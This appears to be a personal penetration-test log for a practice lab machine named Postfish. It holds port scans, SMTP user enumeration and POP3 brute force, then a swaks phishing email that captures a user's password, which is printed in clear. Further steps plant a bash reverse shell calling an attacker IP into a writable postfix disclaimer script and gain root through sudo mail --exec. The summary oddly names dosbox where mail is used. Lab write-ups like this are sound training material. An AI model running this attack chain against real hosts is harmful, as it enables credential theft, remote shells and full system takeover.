Postfish
๐งช Pentest Log: {{date:2025-08-11}}
๐ Target Information
- Machine Name: Postfish
- IP Address: 192.168.148.137
- Operating System: Linux
ip=192.168.148.137
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 25
Check valid user names
smtp-user-enum -M VRFY -D postfish.off -U users.txt -t $ip
Port 80
Web Directory Scan
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
wpscan --url http://$ip
dirsearch -u http://$ip -r -o dirsearch.txt
curl -s http://$ip/ | html2markdown
Link IP to a domain name
echo 192.168.148.137 postfish.off | sudo tee -a /etc/hosts
Found user names
mousepad users.txt
Claire.Madison
Mike.Ross
Brian.Moore
Sarah.Lorem
HR
IT
Sales
Legal
Collect words for bruteforce
cewl http://$ip/ > words.txt
dd if=words.txt of=words_lowercase.txt conv=lcase
Port 110, 995
hydra -L users.txt -P words.txt $ip pop3 -V -f
Port 143, 993
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 25
- Vulnerability Type: Phishing
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
sudo swaks -t brian.moore@postfish.off --from it@postfish.off --server $ip --body "Please reset password using this link http://192.168.45.163/" --header "Subject: Password Reset"
nc -lvnp 80
obtain brian.moore password
brian.moore:EternaLSunshinE
SSH login to gain local.txt
๐งฌ Privilege Escalation
๐ค Current Access
- User: brian.moore
- Groups: brian.moore, mail, filter
- Shell Type: ssh
๐ Enumeration
Linpeas:
wget http://192.168.45.163/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Found /etc/postfix/disclaimer
brian.moore@postfish:~$ ls -al /etc/postfix/disclaimer
-rwxrwx--- 1 root filter 1184 Aug 13 21:51 /etc/postfix/disclaimer
Add a reverse shell into the file
/bin/bash -i >& /dev/tcp/192.168.45.163/21 0>&1
sudo swaks -t brian.moore@postfish.off --from it@postfish.off --server $ip --body "Hi" --header "Subject: Password Reset"
nc -lvnp 21
Check Sudo
sudo -l
found
User filter may run the following commands on postfish:
(ALL) NOPASSWD: /usr/bin/mail *
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Sudo Abuse
- Target Binary/Service: dosbox
- Reference / Source: GTFOBins
๐ง Exploit Steps
- Smash to root
sudo mail --exec='!/bin/sh'